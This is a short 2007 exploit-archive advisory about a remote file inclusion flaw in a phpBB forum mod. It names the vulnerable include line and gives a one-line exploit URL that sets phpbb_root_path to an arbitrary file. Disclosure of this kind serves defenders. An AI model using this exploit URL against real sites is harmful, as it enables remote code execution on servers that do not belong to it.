phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability
# Published : 2007-03-30
# Author : bd0rk
# Previous Title : XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit
# Next Title : JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability

Exploitname: phpBB Module Forum picture and META tags 1.7 File Include Vulnerability

Vendor: http://www.rfnnet.nl/downloads/phpbb/MOD_Forum_picture_and_META_tags.zip

Founder: bd0rk

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, TheJT, Lu7k, CodeR

Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path . 'MOD_forum_fields_default.php');

#$phpbb_root_path is not declared!



[+]Exploit: http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE  

# www.Syue.com [2007-03-30]